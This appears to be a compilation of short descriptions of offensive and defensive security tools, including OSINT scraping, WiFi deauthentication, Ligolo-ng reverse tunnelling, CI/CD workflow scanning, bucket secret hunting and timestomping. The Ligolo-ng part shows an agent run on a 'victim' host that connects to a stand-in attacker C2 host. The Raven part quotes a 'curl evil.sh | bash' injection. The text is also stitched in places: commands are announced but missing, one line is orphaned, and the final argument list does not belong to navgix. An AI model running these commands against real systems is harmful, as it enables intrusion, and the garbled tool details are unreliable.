Introducing Uscrapper 2.0, a powerful OSINT web scraper that extracts personal information from websites. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on a page, and supports multithreading to speed up the process. Uscrapper 2.0 ships with modules for bypassing anti-scraping measures and supports web crawling to scrape sublinks within the same domain. The tool can also generate a report containing the extracted details.
Extracted Details:
Uscrapper extracts the following details from the provided website:
Email Addresses: Displays email addresses found on the website.
Social Media Links: Displays links to various social media platforms found on the website.
Author Names: Displays the names of authors associated with the website.
Geolocations: Displays geolocation information associated with the website.
Non-Hyperlinked Details: Displays non-hyperlinked details found on the website, including email addresses, phone numbers, and usernames.
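As a rough illustration of the regex-driven extraction described above, here is a minimal Python sketch; the patterns are simplified stand-ins for illustration, not Uscrapper's actual signatures:

```python
import re

# Illustrative patterns -- simplified stand-ins, not Uscrapper's real regexes
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
PHONE_RE = re.compile(r"\+?\d[\d\s().-]{7,}\d")
SOCIAL_RE = re.compile(
    r"https?://(?:www\.)?(?:twitter|facebook|linkedin|instagram)\.com/[\w./-]+"
)

def extract_details(page_text: str) -> dict:
    """Pull emails, phone numbers, and social links out of raw page text."""
    return {
        "emails": sorted(set(EMAIL_RE.findall(page_text))),
        "phones": sorted(set(PHONE_RE.findall(page_text))),
        "social_links": sorted(set(SOCIAL_RE.findall(page_text))),
    }
```

In practice the real tool applies many more patterns and also walks hyperlinks, but the core idea is the same: run each signature over the fetched page and deduplicate the hits.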
What's New?:
Uscrapper 2.0:
Introduced multiple modules to bypass anti-web-scraping techniques.
Introduced Crawl and Scrape: an advanced module that crawls a site and scrapes it from within.
Implemented multithreading to make these processes faster.
-u URL, --url URL: Specify the URL of the website to extract details from.
-c INT, --crawl INT: Specify the number of links to crawl.
-t INT, --threads INT: Specify the number of threads to use while crawling and scraping.
-O, --generate-report: Generate a report file containing the extracted details.
-ns, --nonstrict: Display non-strict usernames during extraction.
Note:
Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.
The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.
To bypass some anti-scraping methods we use Selenium, which can make the overall process slower.
Contribution:
Want a new feature to be added?
Make a pull request with all the necessary details and it will be merged after a review.
You can contribute by making the regular expressions more efficient and accurate, or by suggesting some more features that can be added.
Rayder is a command-line tool designed to simplify the orchestration and execution of workflows. It allows you to define a series of modules in a YAML file, each consisting of commands to be executed. Rayder helps you automate complex processes, making it easy to streamline repetitive modules and execute them in parallel when the commands do not depend on each other.
Installation
To install Rayder, ensure you have Go (1.16 or higher) installed on your system. Then, run the following command:
Rayder allows you to use variables in your workflow configuration, making it easy to parameterize your commands and achieve more flexibility. You can define variables in the vars section of your workflow YAML file. These variables can then be referenced within your command strings using double curly braces ({{}}).
Defining Variables
To define variables, add them to the vars section of your workflow YAML file:
vars:
  VAR_NAME: value
  ANOTHER_VAR: another_value
  # Add more variables...
Referencing Variables in Commands
You can reference variables within your command strings using double curly braces ({{}}). For example, if you defined a variable OUTPUT_DIR, you can use it like this:
You can also supply values for variables via the command line when executing your workflow. Use the format VARIABLE_NAME=value to provide values for specific variables. For example:
If you don't provide values for variables via the command line, Rayder will automatically apply default values defined in the vars section of your workflow YAML file.
Remember that variables supplied via the command line will override the default values defined in the YAML configuration.
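The variable behavior described above (YAML defaults, {{VAR}} placeholders, command-line overrides) can be sketched in a few lines of Python; this models the semantics only and is not Rayder's Go implementation:

```python
import re

def parse_cli_vars(args: list) -> dict:
    """Parse VARIABLE_NAME=value pairs supplied on the command line."""
    return dict(arg.split("=", 1) for arg in args if "=" in arg)

def render_command(template: str, defaults: dict, cli_overrides: dict) -> str:
    """Replace {{VAR}} placeholders; CLI-supplied values win over YAML defaults."""
    values = {**defaults, **cli_overrides}
    def substitute(match):
        name = match.group(1)
        if name not in values:
            raise KeyError(f"undefined variable: {name}")
        return str(values[name])
    return re.sub(r"\{\{\s*(\w+)\s*\}\}", substitute, template)
```

For example, with a default OUTPUT_DIR in the vars section and OUTPUT_DIR=/data on the command line, the override is the value that lands in the rendered command.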
Example
Example 1:
Here's an example of how you can define, reference, and supply variables in your workflow configuration:
This will override the default values and use the provided values for these variables.
Example 2:
Here's an example workflow configuration tailored for reverse whois recon: it processes the discovered root domains into subdomains, resolves them, and checks which ones are alive:
The parallel field in the workflow configuration determines whether modules should be executed in parallel or sequentially. Setting parallel to true allows modules to run concurrently, making it suitable for modules with no dependencies. When set to false, modules will execute one after another.
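The parallel semantics can be illustrated with a small Python sketch (Rayder itself is written in Go; this is only a model of the behavior, with each module's commands always run in order internally):

```python
from concurrent.futures import ThreadPoolExecutor
import subprocess

def run_module(commands):
    """Run one module's commands in order; a module is sequential internally."""
    return [
        subprocess.run(cmd, shell=True, capture_output=True, text=True).returncode
        for cmd in commands
    ]

def run_workflow(modules, parallel: bool):
    """Execute modules concurrently when parallel=True, otherwise one by one."""
    if parallel:
        with ThreadPoolExecutor() as pool:
            return list(pool.map(run_module, modules))
    return [run_module(module) for module in modules]
```

Concurrent execution only makes sense when the modules have no dependencies on one another, which matches the guidance above.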
Workflows
Explore a collection of sample workflows and examples in the Rayder workflows repository. Stay tuned for more additions!
Inspiration
Inspiration for this project comes from the Awesome Taskfile project.
Airgorah is a WiFi auditing software that can discover the clients connected to an access point, perform deauthentication attacks against specific clients or all the clients connected to it, capture WPA handshakes, and crack the password of the access point.
It is written in Rust and uses GTK4 for the graphical part. The software is mainly based on aircrack-ng tools suite.
⭐ Don't forget to put a star if you like the project!
Legal
Airgorah is designed for testing and discovering flaws in networks you own. Performing attacks on WiFi networks you do not own is illegal in almost all countries. I am not responsible for any damage you may cause by using this software.
Requirements
This software only works on Linux and requires root privileges to run.
You will also need a wireless network card that supports monitor mode and packet injection.
AntiSquat leverages AI techniques such as natural language processing (NLP), large language models (ChatGPT) and more to empower detection of typosquatting and phishing domains.
How to use
Clone the project via git clone https://github.com/redhuntlabs/antisquat.
Install all dependencies by typing pip install -r requirements.txt.
Create a file named .openai-key and paste your ChatGPT API key in there.
(Optional) Visit https://developer.godaddy.com/keys and grab a GoDaddy API key. Create a file named .godaddy-key and paste your GoDaddy API key in there.
Create a file named "domains.txt". Type in a line-separated list of domains you'd like to scan.
(Optional) Create a file named blacklist.txt. Type in a line-separated list of domains you'd like to ignore. Regular expressions are supported.
Run AntiSquat using python3.8 antisquat.py domains.txt
Examples:
Let's say you'd like to run AntiSquat on "flipkart.com".
Create a file named "domains.txt", then type in flipkart.com. Then run python3.8 antisquat.py domains.txt.
AntiSquat generates several permutations of the domain, iterates through them one by one, and tries to extract all contact information from each page.
Test case:
A test case for amazon.com is attached. To run it without any API keys, simply run python3.8 test.py
Here, the tool appears to have captured a test phishing site for amazon.com. Similar domains that may be available for sale can be captured in this way and any contact information from the site may be extracted.
If you'd like to know more about the tool, make sure to check out our blog.
Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need for SOCKS).
Features
Tun interface (No more SOCKS!)
Simple UI with agent selection and network information
Easy to use and setup
Automatic certificate configuration with Let's Encrypt
Performant (Multiplexing)
Does not require high privileges
Socket listening/binding on the agent
Multiple platforms supported for the agent
How is this different from Ligolo/Chisel/Meterpreter... ?
Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.
When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.
As an example, for a TCP connection:
A SYN is translated to a connect() on the remote host
A SYN-ACK is sent back if connect() succeeds
An RST is sent if ECONNRESET, ECONNABORTED, or ECONNREFUSED is returned by connect()
Nothing is sent on timeout
This allows running tools like nmap without the use of proxychains (simpler and faster).
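The translation rules above can be modeled with a short Python sketch; this mimics only the decision logic, not Ligolo-ng's actual Gvisor-based userland stack:

```python
import errno
import socket

def translate_syn(host: str, port: int, timeout: float = 3.0) -> str:
    """Model the proxy's decision: a tun-side SYN becomes a connect() on the
    agent, and the connect() outcome decides which TCP segment is synthesized."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "SYN-ACK"   # connect() succeeded
    except socket.timeout:
        return "DROP"      # nothing is sent on timeout
    except OSError as exc:
        if exc.errno in (errno.ECONNRESET, errno.ECONNABORTED, errno.ECONNREFUSED):
            return "RST"   # connection actively refused or reset
        return "DROP"
    finally:
        s.close()
```

Because the result of an ordinary connect() drives the synthesized reply, no raw-socket privileges are needed on the agent side.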
Building & Usage
Precompiled binaries
Precompiled binaries (Windows/Linux/macOS) are available on the Release page.
Building Ligolo-ng
Building ligolo-ng (Go >= 1.20 is required):
$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go
Setup Ligolo-ng
Linux
When using Linux, you need to create a tun interface on the Proxy Server (C2):
$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up
Windows
You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).
Running Ligolo-ng proxy server
Start the proxy server on your Command and Control (C2) server (default port 11601):
When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.
Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval
Using your own TLS certificates
If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.
The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.
The -ignore-cert option needs to be used with the agent.
Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.
Using Ligolo-ng
Start the agent on your target (victim) computer (no privileges are required!):
$ ./agent -connect attacker_c2_server.com:11601
If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.
Because the agent runs without privileges, it's not possible to forward raw packets. When you perform an Nmap SYN scan, a TCP connect() is performed on the agent.
When using Nmap, you should use --unprivileged or -PE to avoid false positives.
Todo
Implement other ICMP error messages (this will speed up UDP scans) ;
Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
Find authentication (authn) and authorization (authz) security bugs in web application routes:
Web application HTTP route authn and authz bugs are some of the most common security issues found today. These industry standard resources highlight the severity of the issue:
RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.
With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub, including:
We listed all vulnerabilities discovered using Raven in the tool Hall of Fame.
What is Raven
The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:
Downloader: Downloads the workflows and actions necessary for analysis. Workflows can be downloaded for a specified organization or for all repositories, sorted by star count. This step is a prerequisite for analyzing the workflows.
Indexer: Digests the downloaded data into a graph-based Neo4j database, establishing relationships between workflows, actions, jobs, steps, etc.
Query Library: We created a library of pre-defined queries based on research conducted by the community.
Reporter: Raven has a simple way of reporting suspicious findings. As an example, it can be incorporated into the CI process for pull requests and run there.
Possible usages for Raven:
Scanner for your own organization's security
Scanning specified organizations for bug bounty purposes
Scan everything and report issues found to save the internet
Research and learning purposes
This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.
Why Raven
In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear: the model in which security is delegated to developers has failed. This has been proven several times in our previous content:
A simple injection scenario exposed dozens of public repositories, including popular open-source projects.
We found that one of the most popular frontend frameworks was vulnerable to the innovative method of branch injection attack.
We detailed a completely different attack vector, third-party integration risks, which affected the most popular project on GitHub and thousands more.
Finally, the Microsoft 365 UI framework, with more than 300 million users, is vulnerable to an additional new threat: an artifact poisoning attack.
Additionally, we found, reported, and disclosed hundreds of other vulnerabilities privately.
Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, the vulnerabilities share one commonality: each exploitation can impact millions of victims.
It was for these reasons that Raven was created: a framework for CI/CD security analysis, with GitHub Actions as the first use case. Our focus was on complex scenarios where each issue isn't a threat on its own, but combined they pose a severe threat.
Setup && Run
To get started with Raven, follow these installation instructions:
Step 1: Install the Raven package
pip3 install raven-cycode
Step 2: Setup a local Redis server and Neo4j database
options:
  -h, --help               show this help message and exit
  --token TOKEN            GITHUB_TOKEN used to download data from the GitHub API (needed for effective rate limiting)
  --debug                  Whether to print debug statements, default: False
  --redis-host REDIS_HOST  Redis host, default: localhost
  --redis-port REDIS_PORT  Redis port, default: 6379
  --clean-redis, -cr       Whether to clean the Redis cache, default: False
  --org-name ORG_NAME      Organization name to download the workflows for
options:
  -h, --help               show this help message and exit
  --token TOKEN            GITHUB_TOKEN used to download data from the GitHub API (needed for effective rate limiting)
  --debug                  Whether to print debug statements, default: False
  --redis-host REDIS_HOST  Redis host, default: localhost
  --redis-port REDIS_PORT  Redis port, default: 6379
  --clean-redis, -cr       Whether to clean the Redis cache, default: False
  --max-stars MAX_STARS    Maximum number of stars for a repository
  --min-stars MIN_STARS    Minimum number of stars for a repository, default: 1000
It is possible to run an external action by referencing a folder with a Dockerfile (without an action.yml). Currently, this behavior isn't supported.
It is possible to run an external action by referencing a Docker container through a docker://... URL. Currently, this behavior isn't supported.
It is possible to run an action by referencing it locally. This creates complex behavior, as the action may come from a different repository that was checked out previously. The current behavior is to try to find it in the existing repository.
We aren't modeling the entire workflow structure. If additional fields are needed, please submit a pull request according to the contribution guidelines.
Future Research Work
Implementation of taint analysis. Example use case: a user can pass a pull request title (a controllable parameter) to an action parameter named data. That action parameter may then be used in a run command, run: echo ${{ inputs.data }}, which creates a path to code execution.
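A hypothetical workflow illustrating such a tainted path might look like the following; all repository, action, and input names here are invented for illustration:

```yaml
# Hypothetical workflow: the attacker-controlled PR title flows into an
# action input, which the action later echoes in a run command.
on: pull_request_target

jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      - uses: some-org/some-action@v1                      # hypothetical action
        with:
          data: ${{ github.event.pull_request.title }}     # tainted source

# Inside the hypothetical action (action.yml), the input reaches a shell:
#   - run: echo ${{ inputs.data }}                         # injection sink
```

A PR title such as `"; curl evil.sh | bash #` would then be interpolated directly into the shell command, which is exactly the source-to-sink path the taint analysis aims to detect.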
Expand the research for findings of harmful misuse of GITHUB_ENV. This may utilize the previous taint analysis as well.
Research whether actions/github-script has an interesting threat landscape. If so, it can be modeled in the graph.
Want more of CI/CD Security, AppSec, and ASPM? Check out Cycode
If you liked Raven, you would probably love our Cycode platform, which offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery lifecycle.
If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form https://cycode.com/book-a-demo/.
BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.
The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.
BucketLoot runs in guest mode by default, which means a user doesn't need to specify any API tokens or access keys to run a scan. In guest mode, the tool scrapes at most the 1,000 files returned in the XML listing; if the storage bucket contains more than 1,000 entries the user wants scanned, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.
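The guest-mode listing step can be sketched in Python; this is an illustration assuming an S3-style ListBucketResult document, not BucketLoot's actual implementation:

```python
import xml.etree.ElementTree as ET

# S3-compatible listings use this XML namespace
S3_NS = "{http://s3.amazonaws.com/doc/2006-03-01/}"

def list_bucket_keys(listing_xml: str, limit: int = 1000) -> list:
    """Pull object keys out of an S3-style ListBucketResult document.
    Unauthenticated listings are capped, mirroring S3's 1000-keys-per-page limit."""
    root = ET.fromstring(listing_xml)
    keys = [c.findtext(f"{S3_NS}Key") for c in root.iter(f"{S3_NS}Contents")]
    return keys[:limit]
```

Each returned key can then be fetched and handed to the secret, file-name, and keyword scanners; with platform credentials, pagination past the 1,000-entry cap becomes possible.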
Features
Secret Scanning
Scans for more than 80 unique regex signatures that can uncover secret exposures, tagged with their severity, in the misconfigured storage bucket. Users can modify or add their own signatures in the regexes.json file. If you have any cool signatures that might be helpful to others and could be flagged at scale, go ahead and make a PR!
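Signature-based secret scanning of this kind can be sketched as below; the two signatures shown are illustrative examples in the shape of a regexes.json-style file, not entries from BucketLoot's actual list:

```python
import re

# Illustrative signatures only -- not BucketLoot's real regexes.json contents
SIGNATURES = {
    "AWS Access Key ID": {"regex": r"AKIA[0-9A-Z]{16}", "severity": "high"},
    "Slack Webhook": {
        "regex": r"hooks\.slack\.com/services/[A-Za-z0-9/_-]+",
        "severity": "medium",
    },
}

def scan_secrets(text: str) -> list:
    """Return (signature name, severity, matched string) for every hit."""
    hits = []
    for name, sig in SIGNATURES.items():
        for match in re.findall(sig["regex"], text):
            hits.append((name, sig["severity"], match))
    return hits
```

Keeping the signatures in a JSON file, as BucketLoot does, lets users extend or tune the list without touching the scanner itself.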
Sensitive File Checks
Accidental sensitive file leaks are a big problem affecting the security posture of individuals and organisations. BucketLoot ships with an 80+ signature list in vulnFiles.json that flags these sensitive files based on file names or extensions.
Dig Mode
Want to quickly check whether a target website is using a misconfigured bucket that is leaking secrets or other sensitive data? Dig Mode allows you to pass non-S3 targets and lets the tool scrape URLs from the response body for scanning.
Asset Extraction
Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs, subdomains, and domains present in an exposed storage bucket, giving you a chance of discovering hidden endpoints and an edge over traditional recon tools.
Searching
The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.
With the rapidly increasing variety of attack techniques and a simultaneous rise in the number of detection rules offered by EDRs (Endpoint Detection and Response) and custom-created ones, the need for constant functional testing of detection rules has become evident. However, manually re-running these attacks and cross-referencing them with detection rules is a labor-intensive task which is worth automating.
To address this challenge, I developed PurpleKeep, an open-source project designed to facilitate the automated testing of detection rules. It leverages the Atomic Red Team project, which simulates attacks following MITRE TTPs (Tactics, Techniques, and Procedures); PurpleKeep builds on these TTP simulations to serve as a starting point for evaluating the effectiveness of detection rules.
Automating the process of simulating one or multiple TTPs in a test environment comes with certain challenges, one of which is the contamination of the platform after multiple simulations. However, PurpleKeep aims to overcome this hurdle by streamlining the simulation process and facilitating the creation and instrumentation of the targeted platform.
Primarily developed as a proof of concept, PurpleKeep serves as an End-to-End Detection Rule Validation platform tailored for an Azure-based environment. It has been tested in combination with the automatic deployment of Microsoft Defender for Endpoint as the preferred EDR solution. PurpleKeep also provides support for security and audit policy configurations, allowing users to mimic the desired endpoint environment.
To facilitate analysis and monitoring, PurpleKeep integrates with Azure Monitor and Log Analytics services to store the simulation logs and allow further correlation with any events and/or alerts stored in the same platform.
TLDR: PurpleKeep provides an Attack Simulation platform to serve as a starting point for your End-to-End Detection Rule Validation in an Azure-based environment.
Requirements
The project is based on Azure Pipelines and requires the following to be able to run:
Azure Service Connection to a resource group as described in the Microsoft Docs
Assignment of the "Key Vault Administrator" Role for the previously created Enterprise Application
MDE onboarding script, placed as a Secure File in the Azure DevOps Library and made accessible to the pipelines
Optional
You can provide a security and/or audit policy file that will be loaded to mimic your Group Policy configurations. Use the Secure File option of the Library in Azure DevOps to make it accessible to your pipelines.
Refer to the variables file for your configurable items.
Design
Infrastructure
Deploying the infrastructure uses the Azure Pipeline to perform the following steps:
Deploy Azure services:
Key Vault
Log Analytics Workspace
Data Connection Endpoint
Data Connection Rule
Generate SSH keypair and password for the Windows account and store in the Key Vault
Create a Windows 11 VM
Install OpenSSH
Configure and deploy the SSH public key
Install Invoke-AtomicRedTeam
Install Microsoft Defender for Endpoint and configure exceptions
Currently only the Atomics from the public repository are supported. The pipeline takes a technique ID, or a comma-separated list of techniques, as input, for example:
T1059.003
T1027,T1049,T1003
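Parsing and validating that input format can be sketched as follows; this is a hypothetical helper for illustration, not PurpleKeep's pipeline code:

```python
import re

# MITRE ATT&CK technique IDs: T + 4 digits, with an optional .NNN sub-technique
TECHNIQUE_RE = re.compile(r"^T\d{4}(\.\d{3})?$")

def parse_techniques(value: str) -> list:
    """Split the pipeline input into technique IDs and validate each one."""
    techniques = [t.strip() for t in value.split(",") if t.strip()]
    for t in techniques:
        if not TECHNIQUE_RE.match(t):
            raise ValueError(f"invalid technique ID: {t}")
    return techniques
```

Each validated ID can then be handed to Invoke-AtomicRedTeam on the target VM, one simulation at a time.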
The logs of the simulation are ingested into the AtomicLogs_CL table of the Log Analytics Workspace.
There are currently two ways to run the simulation:
A fresh infrastructure is deployed only at the beginning of the pipeline, and all TTPs are simulated on this instance. This is the fastest way to simulate and avoids onboarding a large number of devices, but running many simulations in the same environment risks contaminating it and making the simulations less stable and predictable.
TODO
Must have
Check whether prerequisites have been fulfilled before executing the atomic
Provide the ability to import your own group policy
Clean up Bicep files and pipelines by using a master template (complete build)
Build a pipeline that runs techniques sequentially with reboots in between
Add the Azure service connection to variables instead of parameters
Nice to have
MDE Off-boarding (?)
Automatically join and leave AD domain
Make the Atomics repository configurable
Deploy VECTR as part of the infrastructure and ingest results during simulation. Also see the VECTR API issue
Tune alert API call to Microsoft Defender for Endpoint (Microsoft.Security alertsSuppressionRules)
Add C2 infrastructure for manual or C2 based simulations
Issues
Atomics do not report whether a simulation succeeded or not
A PowerShell function to perform timestomping on specified files and directories. The function can modify timestamps recursively for all files in a directory.
Change timestamps for individual files or directories.
Recursively apply timestamps to all files in a directory.
Option to use specific credentials for remote paths or privileged files.
I've ported Stompy to C#, Python, and Go; the relevant versions are linked in this repo, each with its own README.
Tool for analyzing SAP Secure Network Communications (SNC).
How to use?
In its current state, sncscan can be used to read the SNC configurations for SAP Router and DIAG (SAP GUI) connections. The implementation for the SAP RFC protocol is currently in development.
SAP Router
SAP Routers either support SNC or they don't; a more granular configuration of the SNC parameters is not possible. Nevertheless, sncscan can find out whether it is activated:
sncscan -H 10.3.161.4 -S 3299 -p router
DIAG / SAP GUI
The SNC configuration of a DIAG connection used by SAP GUI can have more versatile settings than the router configuration. A detailed overview of the system parameters that can be read with sncscan and that impact connection security is given in the Background section.
Requirements: Currently sncscan only works with the pysap library from our fork.
python3 -m pip install -r requirements.txt
or
python3 setup.py test
python3 setup.py install
Background: SNC system parameters
SNC Basics
SAP protocols, such as DIAG or RFC, do not provide high security themselves. To increase security and ensure Authentication, Integrity and Encryption, the use of SNC (Secure Network Communications) is required. SNC protects the data communication paths between various client and server components of the SAP system that use the RFC, DIAG or router protocol by applying known cryptographic algorithms to the data in order to increase its security. There are three different levels of data protection, that can be applied for an SNC secured connection:
Authentication only: Verifies the identity of the communication partners.
Integrity protection: Detects any manipulation of the data exchanged between the communication partners.
Confidentiality protection: Encrypts the transmitted messages.
SNC Parameter
Each SAP system can be configured with SNC parameters for the communication security. The level of the SNC connection is determined by the Quality of Protection parameters:
snc/data_protection/min: Minimum security level required for SNC connections.
snc/data_protection/max: Highest security level initiated by the SAP system.
snc/data_protection/use: Default security level initiated by the SAP system.
Additional SNC parameters can be used for further system-specific configuration options, including the snc/only_encrypted_gui parameter, which ensures that encrypted SAPGUI connections are enforced.
Reading out SNC Parameters
As long as the addressed SAP system is capable of sending SNC messages, it responds to valid SNC requests regardless of which IP, port, and CN were specified for SNC. The response contains the requirements the SAP system imposes on the SNC connection, from which the SNC parameters can be obtained. This reveals whether an SAP system has SNC enabled and, if so, which SNC parameters are set.
MELEE: A Tool to Detect Ransomware Infections in MySQL Instances
Attackers are abusing MySQL instances to conduct nefarious operations on the Internet. Cybercriminals target exposed MySQL instances and trigger infections at scale to exfiltrate data, destroy data, and extort money via ransom. For example, one of the most significant threats MySQL deployments face is ransomware. We have authored a tool named MELEE to detect potential infections in MySQL instances. The tool allows security researchers, penetration testers, and threat intelligence experts to detect compromised and infected MySQL instances running malicious code, and enables efficient research into malware targeting cloud databases. This release of the tool supports the following modules:
Nemesis is an offensive data enrichment pipeline and operator support system.
Built on Kubernetes with scale in mind, our goal with Nemesis was to create a centralized data processing platform that ingests data produced during offensive security assessments.
Nemesis aims to automate a number of repetitive tasks operators encounter on engagements, empower operators' analytic capabilities and collective knowledge, and create structured and unstructured data stores of as much operational data as possible to help guide future research and facilitate offensive data analysis.
Nemesis builds on a large body of other people's work. Throughout the codebase we've provided citations, references, and applicable licenses for anything used or adapted from public sources. If we've forgotten proper credit anywhere, please let us know or submit a pull request!
We also want to acknowledge Evan McBroom, Hope Walker, and Carlo Alcantara from SpecterOps for their help with the initial Nemesis concept and amazing feedback throughout the development process.
This repo contains the code for our USENIX Security '23 paper "ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions". Argus is a comprehensive security analysis tool specifically designed for GitHub Actions. Built with an aim to enhance the security of CI/CD workflows, Argus utilizes taint-tracking techniques and an impact classifier to detect potential vulnerabilities in GitHub Action workflows.
Visit our website - secureci.org for more information.
Features
Taint-Tracking: Argus uses sophisticated algorithms to track the flow of potentially untrusted data from specific sources to security-critical sinks within GitHub Actions workflows. This enables the identification of vulnerabilities that could lead to code injection attacks.
Impact Classifier: Argus classifies identified vulnerabilities into High, Medium, and Low severity classes, providing a clearer understanding of the potential impact of each identified vulnerability. This is crucial in prioritizing mitigation efforts.
Usage
This Python script provides a command line interface for interacting with GitHub repositories and GitHub actions.
This would run the script in repo mode on the master branch of the specified repository.
How to use
Argus can be run inside a docker container. To do so, follow the steps:
Install docker and docker-compose
apt-get -y install docker.io docker-compose
Clone the release branch of this repo
git clone <>
Build the docker container
docker-compose build
Now you can run argus. Example run:
docker-compose run argus --mode {mode} --url {url to target repo}
Results will be available inside the results folder
Viewing SARIF Results
You can view SARIF results either through an online viewer or with a Visual Studio Code (VSCode) extension.
Online Viewer: The SARIF Web Viewer is an online tool that allows you to visualize SARIF files. You can upload your SARIF file (argus_report.sarif) directly to the website to view the results.
VSCode Extension: If you prefer to use VSCode, you can install the SARIF Viewer extension. After installing the extension, you can open your SARIF file (argus_report.sarif) in VSCode. The results will appear in the SARIF Explorer pane, which provides a detailed and navigable view of the results.
Remember to handle the SARIF file with care, especially if it contains sensitive information from your codebase.
Troubleshooting
If GitHub authorization is required, you can provide username:TOKEN in the GITHUB_CREDS environment variable; it will be used for all requests made to GitHub. Note: we do not store this information anywhere, nor create anything in the GitHub account. We only use it for cloning the repositories.
Contributions
Argus is an open-source project, and we welcome contributions from the community. Whether it's reporting a bug, suggesting a feature, or writing code, your contributions are always appreciated!
Cite Argus
If you use Argus in your research, please cite our paper:
@inproceedings{muralee2023Argus,
  title={ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions},
  author={S. Muralee, I. Koishybayev, A. Nahapetyan, G. Tystahl, B. Reaves, A. Bianchi, W. Enck, A. Kapravelos, A. Machiry},
  booktitle={32nd USENIX Security Symposium (USENIX Security 23)},
  year={2023}
}
navgix is a multi-threaded golang tool that will check for nginx alias traversal vulnerabilities
Techniques
Currently, navgix supports two techniques for finding vulnerable directories (or location aliases):
Heuristics
navgix will make an initial GET request to the page. If any directories are referenced in the page HTML (in src attributes of HTML elements), it will test each folder in the path for the vulnerability. For example, if it finds a link to /static/img/photos/avatar.png, it will test /static/, /static/img/, and /static/img/photos/.
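This prefix-expansion step can be sketched in a few lines of Python (navgix itself is written in Go; this is an illustrative approximation):

```python
from urllib.parse import urlparse

def candidate_dirs(asset_url: str) -> list[str]:
    """Derive every parent directory of an asset path, e.g.
    /static/img/photos/avatar.png -> /static/, /static/img/, /static/img/photos/."""
    path = urlparse(asset_url).path
    parts = [p for p in path.split("/") if p][:-1]  # drop the filename
    dirs, prefix = [], ""
    for part in parts:
        prefix += "/" + part
        dirs.append(prefix + "/")
    return dirs

print(candidate_dirs("https://example.com/static/img/photos/avatar.png"))
# -> ['/static/', '/static/img/', '/static/img/photos/']
```

Each of the returned directories would then be tested for the alias-traversal misconfiguration.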
Brute-force
navgix will also test a short list of directories that commonly have this vulnerability; if any of them exist, it will attempt to confirm whether the vulnerability is present.
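The probe behind both techniques is the classic nginx off-by-slash traversal. A hedged Python sketch (navgix's exact confirmation logic may differ) of how a candidate directory is turned into a traversal URL and how responses are triaged:

```python
def probe_url(base: str, directory: str) -> str:
    """Turn a discovered directory such as /static/ into the off-by-slash
    traversal probe /static../ -- a misconfigured
    `location /static { alias /srv/app/static/; }` maps that path one
    directory above the alias target."""
    return base.rstrip("/") + directory.rstrip("/") + "../"

def worth_confirming(probe_status: int) -> bool:
    # A traversal path answering 200 or 403 (rather than the 404 a
    # non-existent path would return) is a candidate for confirmation.
    return probe_status in (200, 403)

print(probe_url("https://example.com", "/static/"))  # https://example.com/static../
```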
Installation
git clone https://github.com/Hakai-Offsec/navgix; cd navgix; go build
Optional Arguments:
/threads - specify maximum number of parallel threads (default=25)
/dc - specify domain controller to query (if not run on a domain-joined host)
/domain - specify domain name (if not run on a domain-joined host)
/ldap - query hosts from the following LDAP filters (default=all)
  :all - All enabled computers with 'primary' group 'Domain Computers'
  :dc - All enabled Domain Controllers (not read-only DCs)
  :exclude-dc - All enabled computers that are not Domain Controllers or read-only DCs
  :servers - All enabled servers
  :servers-exclude-dc - All enabled servers excluding Domain Controllers or read-only DCs
